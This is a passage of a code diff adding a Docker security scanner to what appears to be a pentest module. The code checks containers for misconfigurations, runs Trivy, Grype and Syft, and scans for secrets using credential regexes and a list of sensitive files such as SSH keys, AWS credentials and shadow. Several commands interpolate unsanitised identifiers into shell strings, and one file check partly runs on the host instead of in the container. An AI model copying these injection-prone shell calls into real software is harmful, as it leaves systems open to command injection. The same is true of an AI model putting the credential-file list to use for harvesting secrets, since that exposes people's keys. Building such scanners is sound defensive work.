+  "SYS_PTRACE",
+  "SYS_MODULE",
+  "DAC_READ_SEARCH",
+  "SYS_RAWIO",
+  "SETUID",
+  "SETGID",
+]
+
+/**
+ * Docker Containers namespace
+ */
+export namespace DockerContainers {
+  /**
+   * List all running containers
+   */
+  export async function list(): Promise<ContainerScanTypes.RunningContainer[]> {
+    try {
+      const { stdout } = await execAsync('docker ps --format "{{json .}}"')
+      const containers: ContainerScanTypes.RunningContainer[] = []
+
+      for (const line of stdout.trim().split("\n")) {
+        if (!line.trim()) continue
+
+        try {
+          const raw = JSON.parse(line)
+
+          // Get detailed info
+          const details = await inspect(raw.ID)
+          containers.push(details)
+        } catch {
+          continue
+        }
+      }
+
+      log.info("Docker containers listed", { count: containers.length })
+      return containers
+    } catch (error) {
+      log.error("Failed to list Docker containers", { error })
+      throw new Error(`Failed to list containers: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Get detailed container info
+   */
+  export async function inspect(containerId: string): Promise<ContainerScanTypes.RunningContainer> {
+    try {
+      const { stdout } = await execAsync(`docker inspect ${containerId}`)
+      const data = JSON.parse(stdout)[0]
+
+      // Parse ports
+      const ports: ContainerScanTypes.PortMapping[] = []
+      const portBindings = data.HostConfig?.PortBindings || {}
+      for (const [containerPort, bindings] of Object.entries(portBindings)) {
+        const [port, protocol] = containerPort.split("/")
+        for (const binding of (bindings as { HostIp: string; HostPort: string }[]) || []) {
+          ports.push({
+            containerPort: parseInt(port, 10),
+            hostPort: binding.HostPort ? parseInt(binding.HostPort, 10) : undefined,
+            hostIp: binding.HostIp || undefined,
+            protocol: protocol as "tcp" | "udp",
+          })
+        }
+      }
+
+      // Parse mounts
+      const mounts: ContainerScanTypes.ContainerMount[] = (data.Mounts || []).map(
+        (m: { Type: string; Source: string; Destination: string; Mode: string; RW: boolean }) => ({
+          type: m.Type as "bind" | "volume" | "tmpfs",
+          source: m.Source,
+          destination: m.Destination,
+          mode: m.Mode,
+          readOnly: !m.RW,
+        })
+      )
+
+      // Parse capabilities
+      const capabilities = {
+        add: data.HostConfig?.CapAdd || [],
+        drop: data.HostConfig?.CapDrop || [],
+      }
+
+      return {
+        id: data.Id,
+        name: data.Name?.replace(/^\//, "") || "",
+        image: data.Config?.Image || "",
+        imageId: data.Image || "",
+        created: data.Created || "",
+        state: mapState(data.State?.Status),
+        status: data.State?.Status || "",
+        ports,
+        mounts,
+        labels: data.Config?.Labels,
+        networkMode: data.HostConfig?.NetworkMode,
+        privileged: data.HostConfig?.Privileged || false,
+        user: data.Config?.User || "",
+        capabilities,
+        securityOpt: data.HostConfig?.SecurityOpt,
+        readOnlyRootfs: data.HostConfig?.ReadonlyRootfs || false,
+        pidMode: data.HostConfig?.PidMode,
+        ipcMode: data.HostConfig?.IpcMode,
+      }
+    } catch (error) {
+      log.error("Failed to inspect container", { containerId, error })
+      throw new Error(`Failed to inspect container: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Analyze container for security issues
+   */
+  export async function analyze(
+    container: ContainerScanTypes.RunningContainer,
+    scanId: string,
+    options: {
+      checkPrivileged?: boolean
+      checkRootUser?: boolean
+      checkCapabilities?: boolean
+      checkMounts?: boolean
+      checkNetworking?: boolean
+    } = {}
+  ): Promise<ContainerScanTypes.ContainerFinding[]> {
+    const findings: ContainerScanTypes.ContainerFinding[] = []
+    const {
+      checkPrivileged = true,
+      checkRootUser = true,
+      checkCapabilities = true,
+      checkMounts = true,
+      checkNetworking = true,
+    } = options
+
+    // Check privileged mode
+    if (checkPrivileged && container.privileged) {
+      findings.push(createFinding(
+        container,
+        "critical",
+        "Privileged Container",
+        "Container is running in privileged mode, which grants full access to the host system.",
+        "Run container without --privileged flag",
+        ["cis-docker"]
+      ))
+    }
+
+    // Check root user
+    if (checkRootUser) {
+      if (!container.user || container.user === "root" || container.user === "0") {
+        findings.push(createFinding(
+          container,
+          "high",
+          "Container Running as Root",
+          "Container is running as root user, which increases the impact of container escape vulnerabilities.",
+          "Specify a non-root user with USER directive in Dockerfile or --user flag",
+          ["cis-docker"]
+        ))
+      }
+    }
+
+    // Check capabilities
+    if (checkCapabilities && container.capabilities) {
+      for (const cap of container.capabilities.add) {
+        if (DANGEROUS_CAPABILITIES.includes(cap)) {
+          findings.push(createFinding(
+            container,
+            "high",
+            `Dangerous Capability Added: ${cap}`,
+            `Container has the ${cap} capability added, which may allow privilege escalation.`,
+            `Remove ${cap} capability unless absolutely required`,
+            ["cis-docker"]
+          ))
+        }
+      }
+
+      // Check if ALL capabilities are not dropped
+      if (!container.capabilities.drop.includes("ALL")) {
+        findings.push(createFinding(
+          container,
+          "medium",
+          "Capabilities Not Dropped",
+          "Container does not drop all capabilities. Consider dropping ALL and adding only required ones.",
+          "Use --cap-drop=ALL and add only necessary capabilities with --cap-add",
+          ["cis-docker"]
+        ))
+      }
+    }
+
+    // Check mounts
+    if (checkMounts) {
+      for (const mount of container.mounts) {
+        if (SENSITIVE_MOUNTS.includes(mount.source)) {
+          const isDockerSocket = mount.source === "/var/run/docker.sock"
+
+          findings.push(createFinding(
+            container,
+            isDockerSocket ? "critical" : "high",
+            `Sensitive Path Mounted: ${mount.source}`,
+            isDockerSocket
+              ? "Docker socket is mounted, allowing container to control the Docker daemon and potentially escape to host."
+              : `Sensitive host path ${mount.source} is mounted into the container.`,
+            `Remove mount of ${mount.source} unless absolutely required`,
+            ["cis-docker"]
+          ))
+        }
+
+        // Check for read-write mounts of sensitive paths
+        if (!mount.readOnly && mount.source.startsWith("/etc")) {
+          findings.push(createFinding(
+            container,
+            "high",
+            `Writable Mount of /etc Path`,
+            `Container has write access to ${mount.source}, which could allow modification of host configuration.`,
+            "Mount sensitive paths as read-only",
+            ["cis-docker"]
+          ))
+        }
+      }
+
+      // Check read-only root filesystem
+      if (!container.readOnlyRootfs) {
+        findings.push(createFinding(
+          container,
+          "medium",
+          "Writable Root Filesystem",
+          "Container root filesystem is writable, allowing modifications that may persist or be exploited.",
+          "Run container with --read-only flag",
+          ["cis-docker"]
+        ))
+      }
+    }
+
+    // Check networking
+    if (checkNetworking) {
+      // Host network
+      if (container.networkMode === "host") {
+        findings.push(createFinding(
+          container,
+          "high",
+          "Host Network Mode",
+          "Container uses host network mode, sharing the host's network namespace and bypassing network isolation.",
+          "Use bridge or custom network instead of host mode",
+          ["cis-docker"]
+        ))
+      }
+
+      // Host PID
+      if (container.pidMode === "host") {
+        findings.push(createFinding(
+          container,
+          "high",
+          "Host PID Mode",
+          "Container shares the host's PID namespace, allowing it to see and potentially interfere with host processes.",
+          "Remove --pid=host flag",
+          ["cis-docker"]
+        ))
+      }
+
+      // Host IPC
+      if (container.ipcMode === "host") {
+        findings.push(createFinding(
+          container,
+          "high",
+          "Host IPC Mode",
+          "Container shares the host's IPC namespace, potentially allowing access to shared memory.",
+          "Remove --ipc=host flag",
+          ["cis-docker"]
+        ))
+      }
+
+      // Exposed ports to all interfaces
+      for (const port of container.ports) {
+        if (port.hostPort && (!port.hostIp || port.hostIp === "0.0.0.0")) {
+          findings.push(createFinding(
+            container,
+            "medium",
+            `Port Exposed to All Interfaces: ${port.containerPort}`,
+            `Port ${port.containerPort} is exposed on all interfaces (0.0.0.0), making it accessible from any network.`,
+            "Bind to specific interface (e.g., 127.0.0.1) if not needed externally",
+            []
+          ))
+        }
+      }
+    }
+
+    // Emit findings
+    for (const finding of findings) {
+      Bus.publish(ContainerScanEvents.MisconfigurationFound, {
+        scanId,
+        resourceType: "container",
+        resourceName: container.name,
+        severity: finding.severity,
+        title: finding.title,
+        description: finding.description,
+      })
+    }
+
+    log.info("Container analyzed", {
+      containerId: container.id,
+      name: container.name,
+      findingsCount: findings.length,
+    })
+
+    return findings
+  }
+
+  /**
+   * Analyze all running containers
+   */
+  export async function analyzeAll(
+    scanId: string,
+    options: {
+      checkPrivileged?: boolean
+      checkRootUser?: boolean
+      checkCapabilities?: boolean
+      checkMounts?: boolean
+      checkNetworking?: boolean
+    } = {}
+  ): Promise<ContainerScanTypes.RuntimeScanResult> {
+    const containers = await list()
+    const allFindings: ContainerScanTypes.ContainerFinding[] = []
+
+    let privilegedCount = 0
+    let rootCount = 0
+
+    for (const container of containers) {
+      const findings = await analyze(container, scanId, options)
+      allFindings.push(...findings)
+
+      if (container.privileged) privilegedCount++
+      if (!container.user || container.user === "root" || container.user === "0") rootCount++
+    }
+
+    return {
+      containers,
+      findings: allFindings,
+      scannedAt: Date.now(),
+      stats: {
+        totalContainers: containers.length,
+        privilegedContainers: privilegedCount,
+        rootContainers: rootCount,
+        findingsCount: allFindings.length,
+      },
+    }
+  }
+
+  /**
+   * Get container logs
+   */
+  export async function logs(
+    containerId: string,
+    options: { tail?: number; since?: string } = {}
+  ): Promise<string> {
+    let cmd = `docker logs ${containerId}`
+    if (options.tail) cmd += ` --tail ${options.tail}`
+    if (options.since) cmd += ` --since ${options.since}`
+
+    try {
+      const { stdout, stderr } = await execAsync(cmd)
+      return stdout + stderr
+    } catch (error) {
+      throw new Error(`Failed to get container logs: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Execute command in container
+   */
+  export async function exec(containerId: string, command: string): Promise<string> {
+    try {
+      const { stdout } = await execAsync(`docker exec ${containerId} ${command}`)
+      return stdout
+    } catch (error) {
+      throw new Error(`Failed to exec in container: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Create a finding
+   */
+  function createFinding(
+    container: ContainerScanTypes.RunningContainer,
+    severity: ContainerScanTypes.Severity,
+    title: string,
+    description: string,
+    remediation: string,
+    complianceFrameworks: ContainerScanTypes.ComplianceFramework[]
+  ): ContainerScanTypes.ContainerFinding {
+    return {
+      id: `container-${container.id.slice(0, 12)}-${Date.now()}-${Math.random().toString(36).slice(2, 8)}`,
+      category: "runtime",
+      severity,
+      title,
+      description,
+      resource: {
+        type: "container",
+        name: container.name,
+      },
+      remediation,
+      compliance: complianceFrameworks.map((f) => ({
+        framework: f,
+        control: "Runtime Security",
+      })),
+      evidence: {
+        containerId: container.id,
+        image: container.image,
+      },
+      detectedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Map Docker state to enum
+   */
+  function mapState(state: string): ContainerScanTypes.RunningContainer["state"] {
+    switch (state?.toLowerCase()) {
+      case "running":
+        return "running"
+      case "paused":
+        return "paused"
+      case "restarting":
+        return "restarting"
+      case "exited":
+        return "exited"
+      case "dead":
+        return "dead"
+      default:
+        return "running"
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/docker/images.ts b/packages/opencode/src/pentest/containerscan/docker/images.ts
new file mode 100644
index 00000000000..f044a0fd326
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/docker/images.ts
@@ -0,0 +1,396 @@
+/**
+ * @fileoverview Docker Image Scanner
+ *
+ * Enumerates and scans Docker images for vulnerabilities.
+ *
+ * @module pentest/containerscan/docker/images
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Log } from "../../../util/log"
+import { Bus } from "../../../bus"
+import { ContainerScanTypes } from "../types"
+import { ContainerScanEvents } from "../events"
+import { TrivyParser, GrypeParser, SyftParser } from "../parsers"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "pentest.containerscan.docker.images" })
+
+/**
+ * Docker Images namespace
+ */
+export namespace DockerImages {
+  /**
+   * List all Docker images
+   */
+  export async function list(): Promise<ContainerScanTypes.DockerImage[]> {
+    try {
+      const { stdout } = await execAsync('docker images --format "{{json .}}"')
+      const images: ContainerScanTypes.DockerImage[] = []
+
+      for (const line of stdout.trim().split("\n")) {
+        if (!line.trim()) continue
+
+        try {
+          const raw = JSON.parse(line)
+          images.push({
+            id: raw.ID,
+            repoTags: raw.Repository !== "<none>" ? [`${raw.Repository}:${raw.Tag}`] : [],
+            repoDigests: [],
+            created: raw.CreatedAt,
+            size: parseSize(raw.Size),
+            virtualSize: parseSize(raw.VirtualSize),
+          })
+        } catch {
+          continue
+        }
+      }
+
+      log.info("Docker images listed", { count: images.length })
+      return images
+    } catch (error) {
+      log.error("Failed to list Docker images", { error })
+      throw new Error(`Failed to list Docker images: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Get detailed image info
+   */
+  export async function inspect(imageRef: string): Promise<ContainerScanTypes.DockerImage> {
+    try {
+      const { stdout } = await execAsync(`docker inspect ${imageRef}`)
+      const data = JSON.parse(stdout)[0]
+
+      return {
+        id: data.Id,
+        repoTags: data.RepoTags || [],
+        repoDigests: data.RepoDigests || [],
+        created: data.Created,
+        size: data.Size,
+        virtualSize: data.VirtualSize,
+        labels: data.Config?.Labels,
+        architecture: data.Architecture,
+        os: data.Os,
+        author: data.Author,
+      }
+    } catch (error) {
+      log.error("Failed to inspect Docker image", { imageRef, error })
+      throw new Error(`Failed to inspect image: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Scan image for vulnerabilities using Trivy
+   */
+  export async function scanWithTrivy(
+    image: string,
+    scanId: string,
+    options: {
+      severities?: ContainerScanTypes.Severity[]
+      ignoreUnfixed?: boolean
+      timeout?: number
+      scanSecrets?: boolean
+    } = {}
+  ): Promise<ContainerScanTypes.ImageScanResult> {
+    const cmd = TrivyParser.buildCommand(image, {
+      severities: options.severities,
+      ignoreUnfixed: options.ignoreUnfixed,
+      timeout: options.timeout,
+      scanSecrets: options.scanSecrets,
+    })
+
+    log.info("Scanning image with Trivy", { image, cmd })
+
+    try {
+      const { stdout } = await execAsync(cmd, {
+        timeout: options.timeout || 300000,
+        maxBuffer: 50 * 1024 * 1024, // 50MB buffer
+      })
+
+      const result = TrivyParser.parse(stdout, image)
+
+      // Emit event
+      Bus.publish(ContainerScanEvents.ImageScanned, {
+        scanId,
+        image,
+        tool: "trivy",
+        vulnerabilityCount: result.stats.total,
+        criticalCount: result.stats.critical,
+        highCount: result.stats.high,
+      })
+
+      return result
+    } catch (error) {
+      log.error("Trivy scan failed", { image, error })
+      throw new Error(`Trivy scan failed: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Scan image for vulnerabilities using Grype
+   */
+  export async function scanWithGrype(
+    image: string,
+    scanId: string,
+    options: {
+      onlyFixed?: boolean
+      timeout?: number
+    } = {}
+  ): Promise<ContainerScanTypes.ImageScanResult> {
+    const cmd = GrypeParser.buildCommand(image, {
+      onlyFixed: options.onlyFixed,
+    })
+
+    log.info("Scanning image with Grype", { image, cmd })
+
+    try {
+      const { stdout } = await execAsync(cmd, {
+        timeout: options.timeout || 300000,
+        maxBuffer: 50 * 1024 * 1024,
+      })
+
+      const result = GrypeParser.parse(stdout, image)
+
+      // Emit event
+      Bus.publish(ContainerScanEvents.ImageScanned, {
+        scanId,
+        image,
+        tool: "grype",
+        vulnerabilityCount: result.stats.total,
+        criticalCount: result.stats.critical,
+        highCount: result.stats.high,
+      })
+
+      return result
+    } catch (error) {
+      log.error("Grype scan failed", { image, error })
+      throw new Error(`Grype scan failed: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Generate SBOM using Syft
+   */
+  export async function generateSBOM(
+    image: string,
+    scanId: string,
+    options: {
+      format?: "json" | "cyclonedx-json" | "spdx-json"
+      timeout?: number
+    } = {}
+  ): Promise<ContainerScanTypes.SBOM> {
+    const cmd = SyftParser.buildCommand(image, {
+      format: options.format || "json",
+    })
+
+    log.info("Generating SBOM with Syft", { image, cmd })
+
+    try {
+      const { stdout } = await execAsync(cmd, {
+        timeout: options.timeout || 300000,
+        maxBuffer: 50 * 1024 * 1024,
+      })
+
+      const sbom =
+        options.format === "cyclonedx-json"
+          ? SyftParser.parseCycloneDX(stdout, image)
+          : SyftParser.parse(stdout, image)
+
+      // Emit event
+      Bus.publish(ContainerScanEvents.SBOMGenerated, {
+        scanId,
+        image,
+        format: sbom.format,
+        componentCount: sbom.components.length,
+      })
+
+      return sbom
+    } catch (error) {
+      log.error("SBOM generation failed", { image, error })
+      throw new Error(`SBOM generation failed: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Scan image with both Trivy and Grype for comprehensive results
+   */
+  export async function scanComprehensive(
+    image: string,
+    scanId: string,
+    options: {
+      severities?: ContainerScanTypes.Severity[]
+      ignoreUnfixed?: boolean
+      generateSBOM?: boolean
+      timeout?: number
+    } = {}
+  ): Promise<{
+    result: ContainerScanTypes.ImageScanResult
+    sbom?: ContainerScanTypes.SBOM
+  }> {
+    // Run Trivy and Grype in parallel
+    const [trivyResult, grypeResult] = await Promise.all([
+      scanWithTrivy(image, scanId, options).catch((e) => {
+        log.warn("Trivy scan failed, continuing with Grype only", { error: e.message })
+        return null
+      }),
+      scanWithGrype(image, scanId, options).catch((e) => {
+        log.warn("Grype scan failed, continuing with Trivy only", { error: e.message })
+        return null
+      }),
+    ])
+
+    // Merge results
+    let result: ContainerScanTypes.ImageScanResult
+    if (trivyResult && grypeResult) {
+      result = GrypeParser.mergeWithTrivy(grypeResult, trivyResult)
+    } else if (trivyResult) {
+      result = trivyResult
+    } else if (grypeResult) {
+      result = grypeResult
+    } else {
+      throw new Error("Both Trivy and Grype scans failed")
+    }
+
+    // Generate SBOM if requested
+    let sbom: ContainerScanTypes.SBOM | undefined
+    if (options.generateSBOM) {
+      try {
+        sbom = await generateSBOM(image, scanId, options)
+        result.sbom = sbom
+      } catch (e) {
+        log.warn("SBOM generation failed", { error: e instanceof Error ? e.message : String(e) })
+      }
+    }
+
+    return { result, sbom }
+  }
+
+  /**
+   * Pull an image
+   */
+  export async function pull(image: string): Promise<void> {
+    log.info("Pulling Docker image", { image })
+    try {
+      await execAsync(`docker pull ${image}`, { timeout: 600000 })
+      log.info("Docker image pulled", { image })
+    } catch (error) {
+      throw new Error(`Failed to pull image: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Check if an image exists locally
+   */
+  export async function exists(image: string): Promise<boolean> {
+    try {
+      await execAsync(`docker image inspect ${image}`)
+      return true
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Get image history (layers)
+   */
+  export async function history(image: string): Promise<
+    {
+      id: string
+      createdBy: string
+      size: number
+      comment: string
+    }[]
+  > {
+    try {
+      const { stdout } = await execAsync(`docker history --format "{{json .}}" ${image}`)
+      const layers: { id: string; createdBy: string; size: number; comment: string }[] = []
+
+      for (const line of stdout.trim().split("\n")) {
+        if (!line.trim()) continue
+        try {
+          const raw = JSON.parse(line)
+          layers.push({
+            id: raw.ID,
+            createdBy: raw.CreatedBy,
+            size: parseSize(raw.Size),
+            comment: raw.Comment || "",
+          })
+        } catch {
+          continue
+        }
+      }
+
+      return layers
+    } catch (error) {
+      throw new Error(`Failed to get image history: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Check if Docker is available
+   */
+  export async function isDockerAvailable(): Promise<boolean> {
+    try {
+      await execAsync("docker version")
+      return true
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Check if scanning tools are available
+   */
+  export async function checkTools(): Promise<{
+    docker: boolean
+    trivy: boolean
+    grype: boolean
+    syft: boolean
+  }> {
+    const checks = await Promise.all([
+      execAsync("docker version")
+        .then(() => true)
+        .catch(() => false),
+      execAsync("trivy version")
+        .then(() => true)
+        .catch(() => false),
+      execAsync("grype version")
+        .then(() => true)
+        .catch(() => false),
+      execAsync("syft version")
+        .then(() => true)
+        .catch(() => false),
+    ])
+
+    return {
+      docker: checks[0],
+      trivy: checks[1],
+      grype: checks[2],
+      syft: checks[3],
+    }
+  }
+
+  /**
+   * Parse size string to bytes
+   */
+  function parseSize(size: string): number {
+    if (!size) return 0
+    const match = size.match(/^([\d.]+)\s*([KMGT]?B)?$/i)
+    if (!match) return 0
+
+    const value = parseFloat(match[1])
+    const unit = (match[2] || "B").toUpperCase()
+
+    const multipliers: Record<string, number> = {
+      B: 1,
+      KB: 1024,
+      MB: 1024 * 1024,
+      GB: 1024 * 1024 * 1024,
+      TB: 1024 * 1024 * 1024 * 1024,
+    }
+
+    return Math.round(value * (multipliers[unit] || 1))
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/docker/index.ts b/packages/opencode/src/pentest/containerscan/docker/index.ts
new file mode 100644
index 00000000000..a00baf897a6
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/docker/index.ts
@@ -0,0 +1,12 @@
+/**
+ * @fileoverview Docker Module
+ *
+ * Exports for Docker image, container, and daemon scanning.
+ *
+ * @module pentest/containerscan/docker
+ */
+
+export { DockerImages } from "./images"
+export { DockerContainers } from "./containers"
+export { DockerConfig } from "./config"
+export { DockerSecrets } from "./secrets"
diff --git a/packages/opencode/src/pentest/containerscan/docker/secrets.ts b/packages/opencode/src/pentest/containerscan/docker/secrets.ts
new file mode 100644
index 00000000000..5d4572ddbd5
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/docker/secrets.ts
@@ -0,0 +1,388 @@
+/**
+ * @fileoverview Docker Secret Detection
+ *
+ * Detects secrets and sensitive data in Docker images and containers.
+ *
+ * @module pentest/containerscan/docker/secrets
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Log } from "../../../util/log"
+import { Bus } from "../../../bus"
+import { ContainerScanTypes } from "../types"
+import { ContainerScanEvents } from "../events"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "pentest.containerscan.docker.secrets" })
+
+/**
+ * Secret patterns to detect
+ */
+const SECRET_PATTERNS: { name: string; pattern: RegExp; severity: ContainerScanTypes.Severity }[] = [
+  // AWS
+  { name: "AWS Access Key ID", pattern: /AKIA[0-9A-Z]{16}/g, severity: "critical" },
+  { name: "AWS Secret Access Key", pattern: /[A-Za-z0-9/+=]{40}/g, severity: "critical" },
+
+  // API Keys
+  { name: "Generic API Key", pattern: /api[_-]?key['\"]?\s*[:=]\s*['\"]?[a-zA-Z0-9_-]{16,}/gi, severity: "high" },
+  { name: "Generic Secret", pattern: /secret['\"]?\s*[:=]\s*['\"]?[a-zA-Z0-9_-]{16,}/gi, severity: "high" },
+  { name: "Generic Token", pattern: /token['\"]?\s*[:=]\s*['\"]?[a-zA-Z0-9_-]{16,}/gi, severity: "high" },
+
+  // Private Keys
+  { name: "RSA Private Key", pattern: /-----BEGIN RSA PRIVATE KEY-----/g, severity: "critical" },
+  { name: "SSH Private Key", pattern: /-----BEGIN OPENSSH PRIVATE KEY-----/g, severity: "critical" },
+  { name: "PGP Private Key", pattern: /-----BEGIN PGP PRIVATE KEY BLOCK-----/g, severity: "critical" },
+  { name: "EC Private Key", pattern: /-----BEGIN EC PRIVATE KEY-----/g, severity: "critical" },
+
+  // Database
+  { name: "Database Connection String", pattern: /(?:mongodb|mysql|postgres|redis):\/\/[^\s'"]+/gi, severity: "high" },
+  { name: "Database Password", pattern: /(?:db|database)[_-]?(?:password|pass|pwd)['\"]?\s*[:=]\s*['\"]?[^\s'"]+/gi, severity: "high" },
+
+  // Cloud Providers
+  { name: "Google API Key", pattern: /AIza[0-9A-Za-z_-]{35}/g, severity: "high" },
+  { name: "Google OAuth", pattern: /[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com/g, severity: "high" },
+  { name: "Azure Storage Key", pattern: /[a-zA-Z0-9+/=]{88}/g, severity: "high" },
+
+  // GitHub
+  { name: "GitHub Token", pattern: /gh[pousr]_[A-Za-z0-9_]{36,}/g, severity: "high" },
+  { name: "GitHub App Token", pattern: /ghu_[A-Za-z0-9]{36}/g, severity: "high" },
+
+  // Slack
+  { name: "Slack Token", pattern: /xox[baprs]-[0-9]{10,13}-[0-9]{10,13}[a-zA-Z0-9-]*/g, severity: "high" },
+  { name: "Slack Webhook", pattern: /https:\/\/hooks\.slack\.com\/services\/[A-Za-z0-9+/]+/g, severity: "medium" },
+
+  // JWT
+  { name: "JWT Token", pattern: /eyJ[A-Za-z0-9-_=]+\.eyJ[A-Za-z0-9-_=]+\.?[A-Za-z0-9-_.+/=]*/g, severity: "medium" },
+
+  // Generic Passwords
+  { name: "Password in Config", pattern: /password['\"]?\s*[:=]\s*['\"]?[^\s'"]{8,}/gi, severity: "high" },
+  { name: "Password in URL", pattern: /[a-z]+:\/\/[^:]+:[^@]+@[^\s]+/gi, severity: "high" },
+]
+
+/**
+ * Sensitive file patterns
+ */
+const SENSITIVE_FILES = [
+  ".env",
+  ".env.local",
+  ".env.production",
+  "credentials",
+  "credentials.json",
+  "config.json",
+  "secrets.yaml",
+  "secrets.yml",
+  ".aws/credentials",
+  ".ssh/id_rsa",
+  ".ssh/id_ed25519",
+  ".gnupg/secring.gpg",
+  "id_rsa",
+  "id_ed25519",
+  ".htpasswd",
+  "shadow",
+  "passwd",
+]
+
+/**
+ * Docker Secrets namespace
+ */
+export namespace DockerSecrets {
+  /**
+   * Scan image for secrets using Trivy
+   */
+  export async function scanImageWithTrivy(
+    image: string,
+    scanId: string
+  ): Promise<ContainerScanTypes.ContainerFinding[]> {
+    try {
+      const { stdout } = await execAsync(
+        `trivy image --format json --scanners secret ${image}`,
+        { maxBuffer: 50 * 1024 * 1024, timeout: 300000 }
+      )
+
+      const data = JSON.parse(stdout)
+      const findings: ContainerScanTypes.ContainerFinding[] = []
+
+      for (const result of data.Results || []) {
+        for (const secret of result.Secrets || []) {
+          const finding = createFinding(
+            image,
+            "image",
+            mapSeverity(secret.Severity),
+            secret.Title,
+            `Secret detected: ${secret.Category}`,
+            {
+              ruleId: secret.RuleID,
+              category: secret.Category,
+              startLine: secret.StartLine,
+              endLine: secret.EndLine,
+              target: result.Target,
+            }
+          )
+
+          findings.push(finding)
+
+          // Emit event
+          Bus.publish(ContainerScanEvents.SecretDetected, {
+            scanId,
+            resourceType: "image",
+            resourceName: image,
+            secretType: secret.Category,
+            location: result.Target,
+          })
+        }
+      }
+
+      log.info("Trivy secret scan complete", { image, secretsFound: findings.length })
+      return findings
+    } catch (error) {
+      log.error("Trivy secret scan failed", { image, error })
+      throw new Error(`Secret scan failed: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Scan container environment variables for secrets
+   */
+  export async function scanContainerEnv(
+    containerId: string,
+    containerName: string,
+    scanId: string
+  ): Promise<ContainerScanTypes.ContainerFinding[]> {
+    try {
+      const { stdout } = await execAsync(`docker inspect --format '{{json .Config.Env}}' ${containerId}`)
+      const envVars = JSON.parse(stdout) as string[]
+
+      const findings: ContainerScanTypes.ContainerFinding[] = []
+
+      for (const env of envVars) {
+        const [name, ...valueParts] = env.split("=")
+        const value = valueParts.join("=")
+
+        // Check against secret patterns
+        for (const pattern of SECRET_PATTERNS) {
+          if (pattern.pattern.test(value) || pattern.pattern.test(env)) {
+            const finding = createFinding(
+              containerName,
+              "container",
+              pattern.severity,
+              `${pattern.name} in Environment Variable`,
+              `Potential secret detected in environment variable ${name}`,
+              {
+                variableName: name,
+                patternName: pattern.name,
+              }
+            )
+
+            findings.push(finding)
+
+            // Emit event
+            Bus.publish(ContainerScanEvents.SecretDetected, {
+              scanId,
+              resourceType: "container",
+              resourceName: containerName,
+              secretType: pattern.name,
+              location: `ENV:${name}`,
+            })
+          }
+
+          // Reset regex lastIndex
+          pattern.pattern.lastIndex = 0
+        }
+
+        // Check for common secret variable names
+        const sensitiveNames = ["password", "secret", "key", "token", "credential", "auth", "api_key", "apikey"]
+        const nameLower = name.toLowerCase()
+        if (sensitiveNames.some((s) => nameLower.includes(s)) && value.length > 0) {
+          // Only flag if not already flagged by patterns
+          if (!findings.some((f) => f.evidence?.variableName === name)) {
+            findings.push(createFinding(
+              containerName,
+              "container",
+              "medium",
+              "Sensitive Environment Variable",
+              `Environment variable ${name} appears to contain sensitive data`,
+              {
+                variableName: name,
+                reason: "Variable name suggests sensitive content",
+              }
+            ))
+          }
+        }
+      }
+
+      log.info("Container env scan complete", { containerId, secretsFound: findings.length })
+      return findings
+    } catch (error) {
+      log.error("Container env scan failed", { containerId, error })
+      return []
+    }
+  }
+
+  /**
+   * Scan container for sensitive files
+   */
+  export async function scanContainerFiles(
+    containerId: string,
+    containerName: string,
+    scanId: string
+  ): Promise<ContainerScanTypes.ContainerFinding[]> {
+    const findings: ContainerScanTypes.ContainerFinding[] = []
+
+    for (const file of SENSITIVE_FILES) {
+      try {
+        // Check if file exists in container
+        await execAsync(`docker exec ${containerId} test -f /${file} || test -f /root/${file} || test -f /home/*/${file}`)
+
+        findings.push(createFinding(
+          containerName,
+          "container",
+          "high",
+          `Sensitive File Found: ${file}`,
+          `Sensitive file ${file} was found in the container`,
+          {
+            filePath: file,
+          }
+        ))
+
+        // Emit event
+        Bus.publish(ContainerScanEvents.SecretDetected, {
+          scanId,
+          resourceType: "container",
+          resourceName: containerName,
+          secretType: "Sensitive File",
+          location: file,
+        })
+      } catch {
+        // File doesn't exist, continue
+        continue
+      }
+    }
+
+    log.info("Container file scan complete", { containerId, sensitiveFiles: findings.length })
+    return findings
+  }
+
+  /**
+   * Scan text content for secrets
+   */
+  export function scanText(
+    content: string,
+    resourceName: string,
+    resourceType: "image" | "container"
+  ): ContainerScanTypes.ContainerFinding[] {
+    const findings: ContainerScanTypes.ContainerFinding[] = []
+
+    for (const pattern of SECRET_PATTERNS) {
+      const matches = content.match(pattern.pattern)
+      if (matches) {
+        for (const match of matches) {
+          // Avoid duplicate findings
+          const existingFinding = findings.find(
+            (f) => f.title === pattern.name && f.evidence?.match === match
+          )
+          if (!existingFinding) {
+            findings.push(createFinding(
+              resourceName,
+              resourceType,
+              pattern.severity,
+              pattern.name,
+              `Potential ${pattern.name} detected in content`,
+              {
+                match: obscureSecret(match),
+                patternName: pattern.name,
+              }
+            ))
+          }
+        }
+      }
+
+      // Reset regex lastIndex
+      pattern.pattern.lastIndex = 0
+    }
+
+    return findings
+  }
+
